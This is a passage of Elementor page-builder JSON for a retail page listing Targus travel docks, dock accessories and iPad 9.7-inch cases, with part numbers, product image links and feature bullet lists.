id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bf24fa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c4ea1e8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f009791\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"789ec09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da4ffea\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"280bef3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c1f4b06\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"14ef8dc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"60548a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b553fd8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>VersaLink Universal Dual Video Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK110AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"531cd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a984a69\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C DisplayPort\\u2122 Alt-Mode Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK411)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"929416d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4b4a72e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK412AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad7e09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e8e16dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"933977a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock110usz_grande.jpg?v=1553684661\\\" alt=\\\"VersaLink Universal Dual Video Travel Dock\\\" width=\\\"259\\\" height=\\\"180\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9b8f07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4e11288\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\\\" width=\\\"181\\\" height=\\\"181\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce38b83\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b5d41f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\\\" alt=\\\"Picture of USB-C Alt-Mode Travel Dock w\\/ PD (Black)\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e209b35\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c7ea6f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b59de72\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.<\\/li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.<\\/li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability<\\/li><li>Mac or PC compatible<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cf4acb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed7cdb2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Host-powered 90 mm tethered USB Type-C DisplayPort\\u2122 Alt-Mode (compatible with Thunderbolt\\u2122 3) host connection<\\/li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection<\\/li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port<\\/li><li>1 Gigabit Ethernet port<\\/li><li>HDMI includes 6 (5.1) channel audio<\\/li><li>Universal compatibility with popular Windows\\u00ae and macOS\\u2122 platforms<\\/li><li>Compact size that\\u2019s ideal for travel<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af63771\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a6089bc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>mDP (4096 x 2160 p30 max)<\\/li><li>HDMI (4096 x 2160 p30 max)<\\/li><li>VGA (1920 x 1200)<\\/li><li>USB-C upstream cable (Laptop charging capable by PD pass through)<\\/li><li>2 x USB 3.1 Gen 1 type A downstream port<\\/li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support<\\/li><li>Gigabit Ethernet; Lock Slot<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3110\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e6c4a3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1f4a7f2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"edce3a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6c36b73\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f56d76e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e61842f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99db6fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"aa18c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"adb6db3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"490dda7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1b4a251\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"173a4c8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dock Accessories\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17016d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9c15a98\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4ed087c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C to USB-A Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1104GLX)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0932912\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8825bbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3-Pin 3-Way Hydra DC Power Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1009USX)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce75109\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5870ac3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Multiplexer Adapter<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA46USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4969a2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b576756\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA42USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19c81a5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"ccebe66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b656cbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0053546_usb-cf-to-usb-30-am-cable.jpeg\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1efc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f549af5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0030033_3-pin-3-way-hydra-dc-power-cable.png\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c69d965\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"42471ae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA47GLZ_MAIN1_grande.png?v=1564601685\\\" alt=\\\"USB-C Multiplexer Adapter\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aa37978\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"15b0138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA42USZ_grande.jpg?v=1553683594\\\" alt=\\\"USB-C\\u2122 Demultiplexer\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5635ad5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"bac619d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1f7ee4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>USB Type-C female to USB 3.0 Type-A cable<\\/li><li>10cm long with tether<\\/li><li>Transfers data at rates up to 5 Gbps<\\/li><li>Compatible with Targus DOCK180USZ<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd75d2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bcabecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Powers up to 1 large and 1 small device simultaneously<\\/li><li>Supports three connectors for multi-user and multi-device environments<\\/li><li>Self-locking collars ensure tips and power cable stay in place<\\/li><li>Uses existing Targus power cable and power tips from your powered dock (not included)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30e0068\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c4be429\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports USB-C laptops<\\/li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ<\\/li><li>Compact size for easy carrying<\\/li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port<\\/li><li>5 different charge profiles to ensure compatibility<\\/li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c23edb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ea8be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 USB-C\\/F port<\\/li><li>Enables support for legacy host devices<\\/li><li>Uses universal 3-pin power tip support<\\/li><li>For use with DOCK 180<\\/li><li>Supports power delivery charging up to 60W<\\/li><li>Supports USB 3.0 data transfer up 5 Gbps<\\/li><li>1 USB 3.0 Type A\\/M cable<\\/li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72a48df\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"adce2ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d0ec8ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ae9eaf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f4d772a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4e92ea9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e24acf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c539844\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0ce0714\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75cb4ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7bb65b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4d7d888\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5aab643\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9405cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7d72c96\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablet Cases\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ed426c2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"092906a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2d78b2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Multi-Gen for 9.7\\\" IPad Pro, iPad Air 1, And 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ634GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"93dca52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ab79003\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3D Protection<\\/strong><strong>\\u2122 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">Multi-Gen for <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">9.7 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">iPad Pro, iPad Air 1, and 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ635GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6f08dfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"516eeda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Pro-Tek Rotating iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73711GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"98a279c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b3fdbec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"36a5239\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ634GL_FRONT_grande.png?v=1549412474\\\" alt=\\\"Black VersaVu\\u00ae Classic Case (Black) for iPad\\u00ae (2017\\/2018) (THZ634GL) - Front\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"958ad63\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c2df414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed59759\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"910248c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ73711GL_MAIN1_grande.png?v=1569597181\\\" alt=\\\"Pro-Tek Rotating Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\\\" width=\\\"198\\\" height=\\\"198\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fba5ec6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1e24f29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1914c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape views<\\/li><li>Adjustable viewing angles and comfortable typing angle<\\/li><li>Precision cut access to controls, ports, and camera<\\/li><li>Tray design enhances audio performance<\\/li><li>Integrated stylus holder protects your Apple Pencil\\u2122 or stylus<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Convenient sleep\\/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b20e73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a748414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Infinite viewing angles plus comfortable typing position<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Flexible tray with reinforced corners and bezel protection<\\/li><li>Precision-cut access to controls, ports, and camera lenses<\\/li><li>Easy-grip textured cover with secure magnetic wrap closure<\\/li><li>Tray design enhances audio performance<\\/li><li>Convenient sleep\\/wake function works with iPad Pro\\u00a0 (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ffba5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ba8511\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Color Black \\/ Charcoal &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design enhances protection<\\/li><li>Reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision-cut access to controls, ports, and camera<\\/li><li>Audio-enhancing sound scoops boost sound performance<\\/li><li>Secure magnetic wrap closure<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876b52c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"060847f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"29c5815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9410617\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ef66c6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8b29bf2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da0f29b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0a24c5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a7e46e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"356bcf5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7e3c56\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8b4c09e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"178c12b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Click-In iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73608GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c0be7cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da27b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu <\\/strong><strong>iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc07dd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"76e312e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu Signature iPad 9.7\\\" <\\/strong><strong>2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73902GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a601f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6e3305b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cff07c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73608GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"Click-In Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d78178e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c49cf0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img 